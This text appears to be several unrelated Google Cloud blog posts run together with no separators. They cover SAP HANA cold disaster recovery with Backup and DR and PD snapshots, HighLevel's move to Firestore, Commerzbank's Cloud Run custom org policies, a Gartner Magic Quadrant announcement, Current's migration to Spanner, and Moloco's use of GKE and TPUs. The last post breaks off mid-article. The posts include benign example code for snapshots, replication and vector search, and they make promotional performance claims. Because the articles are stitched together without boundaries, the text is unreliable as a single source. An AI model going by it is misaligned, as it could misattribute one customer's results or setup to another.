For many businesses, the SAP HANA database is the heart of their SAP business applications: a repository of mission-critical data that drives operations. But what happens when disaster strikes?
Protecting a SAP HANA system involves choices. Common methods include HANA System Replication (HSR) for high availability and Backint for backups. A disaster recovery (DR) strategy is crucial, but it doesn’t need to be overly complex or expensive. HSR offers rapid recovery, but it requires a significant investment. For many SAP deployments, a cold DR strategy strikes the right balance between cost-effectiveness and recovery time objectives (RTOs).
What is cold DR? Think of it as your backup plan’s backup plan. It minimizes costs by maintaining a non-running environment that is only activated when disaster strikes. This traditionally means longer RTOs than hot or warm DR, but at significantly lower cost. And while cold DR is often deemed sufficient, businesses are always in search of a better RTO at a lower cost.
Backint, when paired with storage (e.g., Persistent Disk and Cloud Storage), enables data transfer to a secondary location and can be an effective cold DR solution. However, using Backint for DR can mean longer restore times and high storage costs, especially for large databases. Google Cloud delivers a solution that addresses both the cost-effectiveness of cold DR and the rapid recovery of a full DR solution: Backup and DR Service with Persistent Disk (PD) snapshot integration. This approach leverages the power of incremental-forever backups and HANA Savepoints to protect your SAP HANA environment.
Rethinking SAP disaster recovery in Google Cloud
Backup and DR is an enterprise backup and recovery solution that integrates directly with cloud-based workloads that run in Google Compute Engine. Backup and DR provides backup and recovery capabilities for virtual machines (VMs), file systems, multiple SAP databases (HANA, ASE, MaxDB, IQ) as well as Oracle, Microsoft SQL Server, and Db2. You can elect to create backup plans to configure the time of backup, how long to retain backups, where to store the backups (regional/multi-regional) and in what tier of storage, along with specifying database log backup intervals to help ensure a low recovery point objective (RPO).
A recent Backup and DR feature offers Persistent Disk (PD) snapshot integration for SAP HANA databases. This is a significant advancement because the PD snapshots are integrated with SAP HANA Savepoints to help ensure database consistency. When the database is scheduled to be backed up, the Backup and DR agent running on the SAP HANA node instructs the database to trigger a Savepoint image, in which all changed data is written to storage in the form of pages. Another benefit of this integration is that the data copy occurs on the storage side: you no longer copy backup data through the same network interfaces that the database or operating system are using. As a result, production workloads retain their compute and networking resources, even during an active backup.
Once the Savepoint completes, the Backup and DR service triggers the PD snapshots through the Google Cloud storage APIs so that the image is captured on disk, and logs can also be truncated if desired. All of these snapshots are “incremental forever” and database-consistent backups. Alternatively, you can use logs to recover to a point in time (from the HANA PD snapshot image).
Integration with SAP HANA Savepoints is critical to this process. Savepoints are SAP HANA operations, triggered through an API, whose primary use is to speed up restart and recovery times and provide a low RTO: when the system starts up, logs don’t need to be processed from the beginning, only from the last Savepoint position. Savepoints are coordinated across all processes (called SAP HANA services) and instances of the database to ensure transaction consistency.
The HANA Savepoint Backup sequence using PD snapshots can be summarized as:
Tell agent to initiate HANA Savepoint
Initiate PD snapshot, wait for ‘Uploading’ state (seconds)
Tell agent to close HANA Savepoint
Wait for PD snapshot ‘Ready’ state (minutes)
Expire any logs on disk that have passed expiration time
Catalog backup for reporting, auditing
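To make this flow concrete, here is a minimal sketch of the same sequence, assuming the hdbcli SAP HANA driver, the Google API discovery client, and placeholder project, zone, disk, and connection values. The Backup and DR agent performs these steps for you; this is purely illustrative.

```python
import time

from googleapiclient import discovery
from hdbcli import dbapi  # SAP HANA Python client

PROJECT, ZONE, DATA_DISK = "my-project", "us-central1-a", "hana-data-disk"  # placeholders

conn = dbapi.connect(address="hana-host", port=30013, user="SYSTEM", password="...")
cursor = conn.cursor()

# 1. Initiate the HANA Savepoint: prepare a consistent data image on disk.
cursor.execute("BACKUP DATA FOR FULL SYSTEM CREATE SNAPSHOT COMMENT 'pd-snapshot'")
cursor.execute(
    "SELECT BACKUP_ID FROM M_BACKUP_CATALOG "
    "WHERE ENTRY_TYPE_NAME = 'data snapshot' AND STATE_NAME = 'prepared'"
)
backup_id = cursor.fetchone()[0]
snap_name = f"hana-data-{backup_id}"

# 2. Initiate the PD snapshot and wait for it to leave the 'CREATING' state
#    (it moves to 'UPLOADING' within seconds).
compute = discovery.build("compute", "v1")
compute.disks().createSnapshot(
    project=PROJECT, zone=ZONE, disk=DATA_DISK, body={"name": snap_name}
).execute()

def snapshot_status() -> str:
    return compute.snapshots().get(project=PROJECT, snapshot=snap_name).execute()["status"]

while snapshot_status() == "CREATING":
    time.sleep(5)

# 3. Close the HANA Savepoint so normal write activity resumes immediately;
#    the snapshot keeps uploading in the background on the storage side.
cursor.execute(
    f"BACKUP DATA FOR FULL SYSTEM CLOSE SNAPSHOT BACKUP_ID {backup_id} "
    f"SUCCESSFUL '{snap_name}'"
)

# 4. Wait for the PD snapshot 'READY' state (minutes), then catalog the backup.
while snapshot_status() != "READY":
    time.sleep(30)
```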
In addition, you can configure log backups to occur regularly, independent of Savepoint snapshots. These logs are stored on a separate disk and also backed up via PD snapshots, allowing for point-in-time recovery.
Operating system backups
What about operating system backups? Good news: Backup and DR lets you take PD snapshots of the bootable OS disk and, selectively, any other disk attached directly to your Compute Engine VMs. These backup images can also be stored in the same regional or multi-regional location for cold DR purposes.
You can then restore HANA databases to a local VM or your disaster recovery (DR) region. This flexibility allows you to use your DR region for a variety of purposes, such as development and testing, or maintaining a true cold DR region for cost efficiency.
Backup and DR helps simplify DR setup by allowing you to pre-configure networks, firewall rules, and other dependencies. It can then quickly provision a backup appliance in your DR region and restore your entire environment, including VMs, databases, and logs.
This approach gives you the freedom to choose the best DR strategy for your needs: hot, warm, or cold, each with its own cost, RPO, and RTO implications.
One of the key advantages of using Backup and DR with PD snapshots is the significant cost savings it offers compared to traditional DR methods. By eliminating the need for full backups and leveraging incremental-forever snapshots, customers in our testing reduced their storage costs by up to 50%. Additionally, we found that using a cold DR region with Backup and DR can reduce storage consumption by 30% or more compared to a traditional backup-to-file methodology.
Why this matters
Using Google Cloud’s Backup and DR to protect your SAP HANA environment brings a lot of benefits:
Better backup performance (throughput) – the storage layer handles data transfer rather than an agent on the HANA server
Reduced TCO through elimination of regular full backups
Reduced I/O on the SAP HANA server – avoids the database reads and writes of a backup window that, with a regular Backint full backup event, can be very long
Operational simplicity with an onboarding wizard, and no need to manage additional storage provisioning on the source host
Faster recovery times (local or DR) as PD snapshots recover natively to the VM storage subsystem (not copied over customer networks). Recovery to a point in time is possible with logs from the HANA PD snapshot. You can even take more frequent Savepoints by scheduling them every few hours, further reducing log recovery time for restores
Data resiliency – HANA PD Snapshots are stored in regional or multi-regional locations
Low-cost DR – since backup images for VMs and databases are already replicated to your DR region (via regional or multi-regional PD snapshots), recovery is just a matter of bringing up your VM, choosing your recovery point in time for the SAP HANA database, and waiting for a short period of time
When to choose Persistent Disk Asynchronous Replication
While Backup and DR offers a comprehensive solution for many, some customers may have specific needs or preferences that require a different approach. For example, if your SAP application lacks built-in replication, or you need to replicate your data at the disk level, Persistent Disk Asynchronous Replication is a valuable alternative. This approach allows you to spin up new VMs in your DR region using replicated disks, speeding up the recovery process.
PD Async’s infrastructure-level replication is application agnostic, making it ideal for applications without built-in replication. It’s also cost-effective, as you only pay for the storage used by the replicated data. Plus, it offers flexibility, allowing you to customize the replication frequency to balance cost and RPOs.
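For illustration, here is a minimal sketch of the disk-level setup using the Compute Engine API through the Google API discovery client. The project, zone, and disk names are placeholders, and in practice you would typically drive this from Terraform or gcloud instead.

```python
from googleapiclient import discovery

PRIMARY = {"project": "my-project", "zone": "us-central1-a", "disk": "app-disk"}    # placeholders
SECONDARY = {"project": "my-project", "zone": "us-east1-b", "disk": "app-disk-dr"}

compute = discovery.build("compute", "v1")

# 1. Create the secondary disk in the DR region, linked to the primary disk.
primary_uri = "projects/{project}/zones/{zone}/disks/{disk}".format(**PRIMARY)
compute.disks().insert(
    project=SECONDARY["project"], zone=SECONDARY["zone"],
    body={
        "name": SECONDARY["disk"],
        "sizeGb": "100",  # must match the primary disk
        "asyncPrimaryDisk": {"disk": primary_uri},
    },
).execute()

# 2. Start asynchronous replication from the primary to the secondary disk.
secondary_uri = "projects/{project}/zones/{zone}/disks/{disk}".format(**SECONDARY)
compute.disks().startAsyncReplication(
    project=PRIMARY["project"], zone=PRIMARY["zone"], disk=PRIMARY["disk"],
    body={"asyncSecondaryDisk": secondary_uri},
).execute()
```

During a failover you would stop replication and attach the secondary disk to a VM in the DR region.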
If you are interested in setting up PD Async and would like to configure it with Terraform, take a look at this Terraform example, created by one of our colleagues, that shows how to test a failover and failback scenario for a number of Compute Engine VMs.
Take control of your SAP disaster recovery
By leveraging Google Cloud’s Backup and DR and PD Async, you can build a robust and cost-effective cold DR solution for your SAP deployments on Google Cloud that minimizes costs without compromising on data protection, providing peace of mind in the face of unexpected disruptions.
HighLevel is an all-in-one sales and marketing platform built for agencies. We empower businesses to streamline their operations with tools like CRM, marketing automation, appointment scheduling, funnel building, membership management, and more. But what truly sets HighLevel apart is our commitment to AI-powered solutions, helping our customers automate their businesses and achieve remarkable results.
As a software as a service (SaaS) platform experiencing rapid growth, we faced a critical challenge: managing a database that could handle volatile write loads. Our business often sees database writes surge from a few hundred requests per second (RPS) to several thousand within minutes. These sudden spikes caused performance issues with our previous cloud-based document database.
This previous solution required us to provision dedicated resources, which created several bottlenecks:
Slow release cycles: Provisioning resources before every release impacted our agility and time-to-market.
Scaling limitations: We constantly battled DiskOps limitations due to high write throughput and numerous indexes. This forced us to shard larger collections across clusters, requiring complex coordination and consuming valuable engineering time.
Going serverless with Firestore
To overcome these challenges, we sought a database solution that could seamlessly scale and handle our demanding write requirements.
Firestore’s serverless architecture made it a strong contender from the start. But it was the arrival of point-in-time recovery and scheduled backups that truly solidified our decision. These features eliminated our initial concerns and gave us the confidence to migrate the majority of HighLevel’s workloads to Firestore.
Since migrating to Firestore, we have seen significant benefits, including:
Increased developer productivity: Firestore’s simplicity has boosted our developer productivity by 55%, allowing us to focus on product innovation.
Enhanced scalability: We’ve scaled to over 30 billion documents without any manual intervention, handling workloads with spikes of up to 250,000 RPS and five million real-time queries.
Improved reliability: Firestore has proven exceptionally reliable, ensuring consistent performance even under peak load.
Real-time capabilities: Firestore’s real-time sync capabilities power our real-time dashboards without the need for complex socket infrastructure.
Firestore powering HighLevel’s AI
Firestore also plays a crucial role in enabling our AI-powered services across Conversation AI, Content AI, Voice AI and more. All these services are designed to put our customers’ businesses on autopilot.
Fig. 1: HighLevel AI features
For Conversation AI, for example, we use a retrieval augmented generation (RAG) architecture. This involves crawling and indexing customer data sources, generating embeddings, and storing them in Firestore, which acts as our vector database. This approach allows us to:
Overcome context window limitations of generative AI models
Reduce latency and cost
Improve response accuracy and minimize hallucinations
Fig. 2: HighLevel’s AI Architecture
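To illustrate the pattern (not HighLevel’s actual code), here is a minimal sketch of Firestore’s vector search API, assuming a hypothetical kb_chunks collection and a hypothetical embed() helper that calls your embedding model:

```python
from google.cloud import firestore
from google.cloud.firestore_v1.vector import Vector
from google.cloud.firestore_v1.base_vector_query import DistanceMeasure

db = firestore.Client()

def embed(text: str) -> list[float]:
    """Hypothetical helper: call your embedding model (e.g., on Vertex AI)."""
    raise NotImplementedError

# Indexing: store each crawled chunk together with its embedding vector.
db.collection("kb_chunks").add({
    "text": "Our return policy lasts 30 days...",
    "embedding": Vector(embed("Our return policy lasts 30 days...")),
})

# Retrieval: fetch the nearest chunks to ground the model's answer.
nearest = db.collection("kb_chunks").find_nearest(
    vector_field="embedding",
    query_vector=Vector(embed("What is your return policy?")),
    distance_measure=DistanceMeasure.COSINE,
    limit=5,
).get()
context = "\n".join(doc.to_dict()["text"] for doc in nearest)
```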
Lessons learned and a path forward
Fig. 3: Google Firestore field indexes data
Our journey with Firestore has been eye-opening, and we’ve learned valuable lessons along the way.
For example, in December 2023, we encountered intermittent failures in collections with high write queries per second (QPS). These collections were experiencing write latencies of up to 60 seconds, causing operations to fail as deadlines expired before completion. With support from the Firestore team, we conducted a root-cause analysis and discovered that the issue stemmed from default single-field indexes on constantly increasing fields. These indexes, while helpful for single-field queries, were generating excessive writes on a specific sector of the index.
Once we understood the root cause, our team identified and excluded these unused indexes. This optimization resulted in a dramatic improvement, reducing write-tail latency from 60 seconds to just 15 seconds.
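For reference, a single-field index exemption like the one described can be applied through the Firestore Admin API; this is a minimal sketch with placeholder project, collection-group, and field names (the same exemption can also be managed from the console or gcloud):

```python
from google.cloud import firestore_admin_v1

admin = firestore_admin_v1.FirestoreAdminClient()

# Disable the default single-field indexes on a constantly increasing
# field (placeholder names) by setting an empty index configuration.
field = firestore_admin_v1.Field(
    name=admin.field_path("my-project", "(default)", "events", "created_at"),
    index_config=firestore_admin_v1.Field.IndexConfig(indexes=[]),
)
admin.update_field(request={"field": field}).result()  # long-running operation
```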
Firestore has been instrumental in our ability to scale rapidly, enhance developer productivity, and deliver innovative AI-powered solutions. We are confident that Firestore will remain a cornerstone of our technology stack as we grow and evolve. Moving forward, we are excited to keep leveraging Firestore and Google Cloud to power our AI initiatives and deliver exceptional value to our customers.
Get started
Are you curious to learn more about how to use Firestore in your organization?
Watch our Next 2024 breakout session to discover recent Firestore updates, learn more about how HighLevel is experiencing significant total cost of ownership savings, and more!
This project has been a team effort. Shout out to the Platform Data team — Pragnesh Bhavsar in particular who has done an amazing job leading the team to ensure our data infrastructure runs at such a massive scale without hiccups. We also want to thank Varun Vairavan and Kiran Raparti for their key insights and guidance. For more from Karan Agarwal, follow him on LinkedIn.
Financial institutions routinely process many millions of transactions daily, and when they run on cloud technology, any security lapse in their cloud infrastructure can have catastrophic consequences. For serverless compute workloads, many rely on Cloud Run on Google Cloud. That’s why we are happy to announce the general availability of Google Cloud’s custom organization (org) policies for Cloud Run, which help fortify Cloud Run environments and align them with everything from baseline requirements to the most stringent regulatory standards.
Financial services institutions operate under stringent global and local regulatory frameworks and bodies, such as the EU’s European Banking Authority, the US Securities and Exchange Commission, and the Monetary Authority of Singapore. The sensitive nature of financial data also necessitates robust security measures. Maintaining a comprehensive security posture is therefore of major importance, encompassing both coarse-grained and fine-grained controls to address internal and external threats.
Tailored Security, Configurable to Customers’ Needs
Custom org policies give organizations granular, customizable guardrails over how Cloud Run is used, including:
Network Access: Reduce unauthorized access attempts by precisely defining VPC configurations and ingress settings.
Deployment Security: Mandatory binary authorization is able to prevent potentially harmful deployments.
Resource Efficiency: Constraints on memory and CPU usage ensure getting the most out of cloud resources.
Stability & Consistency: Limiting the use of Cloud Run features to those in general availability (GA) and enforcing standardized naming conventions enables a predictable, manageable environment.
This level of customization enables building a Cloud Run environment that’s not just secure, but also perfectly aligned with unique operational requirements.
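As a hedged illustration of what such a guardrail might look like, the sketch below uses the Org Policy v2 client to define a custom constraint on Cloud Run services. The organization ID, constraint name, and CEL condition are hypothetical; consult the Cloud Run custom-constraint documentation for the resource fields actually available in conditions.

```python
from google.cloud import orgpolicy_v2

client = orgpolicy_v2.OrgPolicyClient()

# Hypothetical custom constraint: only allow Cloud Run services whose
# ingress is restricted to internal traffic. The condition expression is
# illustrative, not a verified field path.
constraint = orgpolicy_v2.CustomConstraint(
    name="organizations/123456789012/customConstraints/custom.runInternalIngressOnly",
    resource_types=["run.googleapis.com/Service"],
    method_types=[
        orgpolicy_v2.CustomConstraint.MethodType.CREATE,
        orgpolicy_v2.CustomConstraint.MethodType.UPDATE,
    ],
    condition="resource.metadata.annotations['run.googleapis.com/ingress'] == 'internal'",
    action_type=orgpolicy_v2.CustomConstraint.ActionType.ALLOW,
    display_name="Cloud Run services must use internal ingress",
)
client.create_custom_constraint(
    parent="organizations/123456789012",
    custom_constraint=constraint,
)
# The constraint takes effect once an org policy that references
# custom.runInternalIngressOnly is enforced on the organization.
```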
Addressing the Complexities of Commerzbank’s Cloud Run Setup
Within Commerzbank’s Big Data & Advanced Analytics division, the company leverages cloud technology for its inherent benefits, particularly serverless services. Cloud Run is a crucial component of our serverless architecture and stretches across many applications due to its flexibility. While Cloud Run already offered security features such as VPC Service Controls, multi-regionality, and CMEK support, granular control over all Cloud Run’s capabilities was initially limited.
Diagram illustrating simplified policy management with Custom Org Policies
Better Together
The introduction of Custom Org Policies for Cloud Run now allows Commerzbank to directly map its rigorous security controls, ensuring compliant use of the service. This enhanced control enables the full-scale adoption and scalability of Cloud Run to support our business needs.
The granular control made possible by Custom Org Policies has been a game-changer. Commerzbank and customers like it can now tailor their security policies to their exact needs, preventing potential breaches and ensuring regulatory compliance.
A Secure Foundation for Innovation
Custom Org Policies have become an indispensable part of the cloud security toolkit. Their ability to enforce granular, tailored controls has boosted Commerzbank’s Cloud Run security and compliance. This newfound confidence allows them to innovate with agility, knowing their cloud infrastructure is locked down.
If you’re looking to enhance your Cloud Run security and compliance, we highly recommend exploring Custom Org Policies. They’ve been instrumental in Commerzbank’s journey, and we’re confident they can benefit your organization, too.
Looking Ahead: We’re also eager to explore how to leverage custom org policies for other Google Cloud services as Commerzbank continues to expand its cloud footprint. The bank’s commitment to security and compliance is unwavering, and custom org policies will remain a cornerstone of Commerzbank’s strategy.
We’re excited to share that Gartner has recognized Google as a Leader in the 2024 Gartner® Magic Quadrant™ for Data Integration Tools. As a Leader in this report, we believe Google’s position is a testament to delivering continuous customer innovation in areas such as unified data to AI governance, flexible and accessible data engineering experiences, and AI-powered data integration capabilities.
Today, most organizations operate with just 10% of the data they generate, which is often trapped in silos and disconnected legacy systems. The rise of AI unlocks the potential of the remaining 90%, enabling you to unify this data — regardless of format — within a single platform.
This convergence is driving a profound shift in how data teams approach data integration. Traditionally, data integration was seen as a separate IT process solely for enterprise business intelligence. But with the increased adoption of the cloud, we’re witnessing a move away from legacy on-premises technologies and towards a more unified approach that enables various users to access and work with a more robust set of data sources.
At the same time, organizations are no longer content with simply collecting data; they need to analyze it and activate it in real time to gain a competitive edge. This is why leading enterprises are either migrating to or building their next-gen data platforms with BigQuery, converging the worlds of data lakes and warehouses. BigQuery’s unified data and AI capabilities, combined with Google Cloud’s comprehensive suite of fully managed services, empower organizations to ingest, process, transform, orchestrate, analyze, and activate their data with unprecedented speed and efficiency. This end-to-end vision delivers on the promise of data transformation, so businesses can unlock the full value of their data and drive innovation.
Choice and flexibility to meet you where you are
Organizations thrive on data-driven decisions, but often struggle to wrangle information scattered across various sources. Google Cloud tools simplify data integration by letting you:
Streamline data integration from third-party applications – With BigQuery Data Transfer Service, onboarding data from third-party applications like Salesforce or Marketo becomes dramatically simplified, eliminating complex coding and saving valuable time and data movement costs.
Create SQL-based pipelines – Dataform helps create robust, SQL-based pipelines, orchestrating the entire data integration flow easily and scalably. This flexibility empowers organizations to connect all their data dots, wherever they are, so they can unlock valuable insights faster.
Use gen-AI powered data preparation – BigQuery data preparation empowers analysts to clean and prepare data directly within BigQuery, using Gemini’s AI for intelligent transformations to streamline processes and help ensure data quality.
Bridging operational and analytical systems
Data teams know how frustrating it can be to have valuable analytical insights trapped in a data warehouse, disconnected from the operational systems where they could make a real impact. You don’t want to get bogged down in the complexities of ELT vs. ETL vs. ETL-T — you need solutions that prioritize SLAs to ensure on-time and consistent data delivery. This means having the right connectors to meet your needs, especially with the growing importance of real-time data. Google Cloud offers a powerful suite of integrated tools to bridge this gap, helping you easily connect your analytical insights with your operational systems to drive real-time action. With Google Cloud’s data tools, you can:
Perform advanced similarity searches and AI-powered analysis – Vector support across BigQuery and all Google databases lets you perform advanced similarity searches and AI-powered analysis directly on operational data.
Query operational data without moving it – Data Boost enables analysts to query data in place across sources like Bigtable and Vertex AI, while BigQuery’s continuous queries facilitate reverse ETL, pushing updated insights back into operational systems.
Implement real-time data integration and change data capture – Datastream captures changes and delivers them with low latency. Dataflow, Google Managed Service for Kafka, Pub/Sub, and new support for Apache Flink further enhance the reverse ETL process, fueling operational systems with fresh, actionable insights derived from analytics, all while using popular open-source software.
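As one concrete example of the similarity-search point above, BigQuery’s VECTOR_SEARCH function can run a nearest-neighbor search directly in SQL. This minimal sketch assumes a hypothetical demo_ds.item_embeddings table with id, content, and embedding columns, and an inline query vector:

```python
from google.cloud import bigquery

client = bigquery.Client()

# Find the five stored rows nearest to an ad-hoc query embedding.
# Table, columns, and the literal query vector are hypothetical.
sql = """
SELECT base.id, base.content, distance
FROM VECTOR_SEARCH(
  TABLE demo_ds.item_embeddings,
  'embedding',
  (SELECT [0.12, -0.45, 0.91] AS embedding),
  top_k => 5,
  distance_type => 'COSINE')
"""
for row in client.query(sql).result():
    print(row.id, row.distance)
```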
Governance at the heart of a unified data platform
Having strong data governance is critical, not just a checkbox item. It’s the foundation of ensuring your data is high-quality, secure, and compliant with regulations. Without it, you risk costly errors, security breaches, and a lack of trust in the insights you generate. BigQuery treats governance as a core component, not an afterthought, with a range of built-in features that simplify and automate the process, so you can focus on what matters most — extracting value from your data.
Easily search, curate and understand data with accelerated data exploration – With BigQuery data insights powered by Gemini, users can easily search, curate, and understand the data landscape, including the lineage and context of data assets. This intelligent discovery process helps remove the guesswork and accelerates data exploration.
Automatically capture and manage metadata – BigQuery’s automated data cataloging capabilities automatically capture and manage metadata, minimizing manual harvesting and helping to ensure consistency.
Google Cloud’s infrastructure is purpose-built with AI in mind, allowing users to easily leverage generative AI capabilities at scale. Users can train models, generate vector embeddings and indexes, and deploy data and AI use cases without leaving the platform. AI is infused throughout the user journey, with features like Gemini-assisted natural language processing, secure model integration, AI-augmented data exploration, and AI-assisted data migrations. This AI-centric approach delivers a strong user experience for data practitioners with varying skill sets and expertise.
2024 Gartner Magic Quadrant for Data Integration Tools, Thornton Craig et al., December 3, 2024. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Google. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and MAGIC QUADRANT is a registered trademark of Gartner, Inc. and/or its affiliates and are used herein with permission. All rights reserved.
Editor’s note: In the heart of the fintech revolution, Current is on a mission to transform the financial landscape for millions of Americans living paycheck to paycheck. Founded on the belief that everyone deserves access to modern financial tools, Current is redefining what it means to be a financial institution in the digital age. Central to their success is a cloud-native infrastructure built on Google Cloud, with Spanner, Google’s globally distributed database with virtually unlimited scale, serving as the bedrock of their core platform.
More than 100 million Americans struggle to make ends meet, including the 23% of low-income Americans the Federal Reserve estimates do not have a bank account. Current was created to address their needs with a unique business model focused on payments, rather than the deposits and withdrawals of traditional financial institutions. We offer an easily accessible experience designed to make financial services available to all Americans, regardless of age or income.
Our innovative approach — built on proprietary banking core technology with minimal reliance on third-party providers — enables us to rapidly deploy financial solutions tailored to our members’ immediate needs. More importantly, these solutions are flexible enough to evolve alongside them in the future.
In our mission to deliver an exceptional experience, one of the biggest challenges we faced was creating a scalable and robust technological foundation for our financial services. To address this, we developed a modern core banking system to power our platform. Central to this core is our user graph service, which manages all member entities — such as users, products, wallets, and gateways.
Many unbanked and disadvantaged Americans lack bank accounts due to a lack of trust in institutions as much as because of any lack of funds. If we were going to win their trust and business, we knew we had to have a secure, seamless, and reliable service.
A cloud-native core with Spanner
Our previous self-hosted graph database solution lacked cloud-native capabilities and horizontal scalability. To address these limitations, we strategically transitioned to managed persistence layers, which significantly improved our risk posture. Features like point-in-time restore and multi-regional redundancy enhanced our resilience, reduced recovery time objectives (RTO), and improved recovery point objectives (RPO). Additionally, push-button scaling optimized our cloud budget and operational efficiency.
This cloud-native platform necessitated a database solution with consistent writes, horizontal scalability, low read latency under load, and multi-region failover. Given our extensive use of Google Cloud, we prioritized its database offerings. Spanner emerged as the ideal solution, fulfilling all our requirements. It offers consistent writes, horizontal scalability, and the ability to maintain low read latency even under heavy load. Its seamless scalability — particularly the decoupling of compute and storage resources — proved invaluable in adapting to our dynamic consumer environment.
This robust and scalable infrastructure empowers Current to deliver reliable and efficient financial services, critical for building and maintaining member trust. We are the primary financial relationship for millions of Americans who are trusting us with their money week after week. Our experience migrating from a third-party database to Spanner proved that transitioning to a globally scalable, highly available database can be easy and seamless. Spanner’s unique ability to scale compute and storage independently proved invaluable in managing our dynamic user base.
Our strategic migration to Spanner employed a write-ahead commit log to ensure a seamless transition. By prioritizing the migration of reads and verifying their accuracy before shifting writes, we minimized risk and maximized efficiency. This process resulted in a zero-downtime, zero-loss cutover, where we could first transition reads to Spanner on a service-by-service basis, confirm accuracy, and finally migrate writes.
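The read-verification step might look something like this minimal sketch, with hypothetical instance, database, table, and column names:

```python
from google.cloud import spanner
from google.cloud.spanner_v1 import param_types

client = spanner.Client()
database = client.instance("core-banking").database("user-graph")  # placeholders

def spanner_user(user_id: str):
    # Strongly consistent read of one user row from Spanner.
    with database.snapshot() as snapshot:
        rows = snapshot.execute_sql(
            "SELECT UserId, Email, WalletId FROM Users WHERE UserId = @id",
            params={"id": user_id},
            param_types={"id": param_types.STRING},
        )
        return next(iter(rows), None)

def verify(user_id: str, legacy_row: tuple) -> bool:
    # Shadow read: serve from the legacy store, compare against Spanner,
    # and flag mismatches before cutting writes over service by service.
    row = spanner_user(user_id)
    return row is not None and tuple(row) == legacy_row
```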
Ultimately, our Spanner-powered user graph service delivered the consistency, reliability, and scalability essential for our financial platform. We had renewed confidence in our ability to serve our millions of customers with reliable service and new abilities to scale our existing services and future offerings.
Unwavering Reliability and Enhanced Operational Efficiency
Spanner has dramatically improved our resilience, reducing RTO and RPO by more than 10x, cutting times to just one hour. With Spanner’s streamlined data restoration process, we can now recover data with a few simple clicks. Offloading operational management has also significantly decreased our team’s maintenance burden. With nearly 5,000 transactions per second, we continue to be impressed by Spanner’s performance and scalability.
Additionally, since migrating to Spanner, we have reduced our availability-related incidents to zero. Such incidents could disrupt essential banking functions like accessing funds or making payments, leading to customer dissatisfaction and potential churn, as well as increased operational costs for issue resolution. Elimination of these occurrences is critical for building and maintaining member trust, enhancing retention, and improving the developer experience.
Building Financial Resilience with Google Cloud
Looking ahead, we envision a future where our platform continues to evolve, delivering innovative financial solutions that meet the ever-changing needs of our members. With Spanner as the foundation of our core platform — you could call it the core of cores — we are confident in building a resilient and reliable platform that enables millions more Americans to improve their financial outcomes.
In today’s congested digital landscape, businesses of all sizes face the challenge of optimizing their marketing budgets. They must find ways to stand out amid the bombardment of messages vying for potential customers’ attention. Moreover, they grapple with rising customer acquisition costs and dwindling retention rates, impeding their profitability.
Adding to this complexity is the abundance of consumer data, which businesses often struggle to harness effectively to target the right audience. To address these challenges, companies are seeking data-driven approaches to enhance their advertising effectiveness, to help ensure their continued relevance and profitability.
Moloco offers AI-powered advertising solutions that drive user acquisition, retention, and monetization efforts. Moloco Ads, its demand-side platform (DSP), utilizes its customers’ unique first-party data, helping them to target and acquire high-value users based on real-time consumer behavior — ultimately, delivering higher conversion rates and return on investment.
To meet this demand, Moloco leverages predictions from a dozen deep neural networks, while continuously designing and evaluating new models. The platform ingests 10 petabytes of data per day and processes bid requests at a peak rate of 10.5 million queries per second (QPS).
Moloco has seen tremendous growth over the last three years, with its business growing over 8X and multiple customers spending more than $50 million annually. Moloco’s rapid growth required an infrastructure that could handle massive data processing and real-time ML predictions while remaining cost effective. As Moloco’s models grew in complexity, training times increased, hindering productivity and innovation. Separately, the Moloco team realized that they also needed to optimize serving efficiency to scale low-latency ad experiences for users across the globe.
Training complex ML models with GKE
After evaluating multiple cloud providers and their solutions, Moloco opted for Google Cloud for its scalability, flexibility, and robust partner ecosystem. The infrastructure provided by Google Cloud aligned with Moloco’s requirements for handling its rapidly growing data and machine learning workloads, which are instrumental to optimizing customers’ advertising performance.
Google Kubernetes Engine (GKE) was a primary reason for Moloco selecting Google Cloud over other cloud providers. As Moloco discovered, GKE is more than a container orchestration tool; it’s a gateway to harnessing the full potential of AI and ML. GKE provides scalability and performance optimization tools to meet diverse ML workloads, and supports a wide range of frameworks, allowing Moloco to customize the platform according to their specific needs.
GKE serves as a foundation for a unified AI/ML platform, integrating with other Google Cloud services, facilitating a robust environment for the data processing and distributed computing that underpin Moloco’s complex AI and ML tasks. GKE’s ML data layer offers the high-throughput storage solutions that are crucial for read-heavy workloads. Features like cluster autoscaler, node-auto provisioner, and pod autoscalers ensure efficient resource allocation.
“Scaling our infrastructure as Moloco’s Ads business grew exponentially was a huge challenge. GKE’s autoscaling capabilities enabled the engineering team to focus on development without spending a ton of effort on operations.” – Sechan Oh, Director of Machine Learning, Moloco
Shortly after migrating to Google Cloud, Moloco began using GKE for model training. However, Moloco quickly found that using traditional CPUs was not competitive at its scale, in terms of both cost and velocity. GKE’s ability to autoscale on multi-host Tensor Processing Units (TPUs), Google’s specialized processing units for machine learning workloads, was critical to Moloco’s success, allowing Moloco to harness TPUs at scale, resulting in significant enhancements in training speed and efficiency.
Moloco further leveraged GKE’s AI and ML capabilities to optimize the management of its compute resources, minimizing idle time and generating cost savings while improving performance. Notably, GKE empowered Moloco to scale its ML infrastructure to accommodate exponential business growth without straining its engineering team. This enabled Moloco’s engineers to concentrate on developing AI and ML software instead of managing infrastructure.
“The GKE team collaborated closely with us to enable auto scaling for multi host TPUs, which is a recently added feature. Their help has really enabled amazing performance on TPUs, reducing our cost per training job by 2-4 times.” – Kunal Kukreja, Senior Machine Learning Engineer, Moloco
In addition to training models on TPUs, Moloco also uses GPUs on GKE to deploy ML models into production. This lets the Moloco platform handle real-time inference requests effectively and benefit from GKE’s scalability and operational stability, enhancing performance and supporting more complex models.
Moloco collaborated closely with the Google Cloud team throughout the implementation process, leveraging their expertise and guidance. The Google Cloud team supported Moloco in implementing solutions that ensured a smooth transition and minimal disruption to operations. Specifically, Moloco worked with the Google Cloud team to migrate its ML workloads to GKE using the platform’s autoscaling and pod prioritization capabilities to optimize resource utilization and cost efficiency. Additionally, Moloco integrated Cloud TPUs into its training pipeline, resulting in significantly reduced training times for complex ML models. Furthermore, Moloco optimized its serving infrastructure with GPUs, ensuring low-latency ad experiences for its customers.
A powerful foundation for ML training and inference
Moloco’s collaboration with Google Cloud profoundly transformed its capacity for innovation.
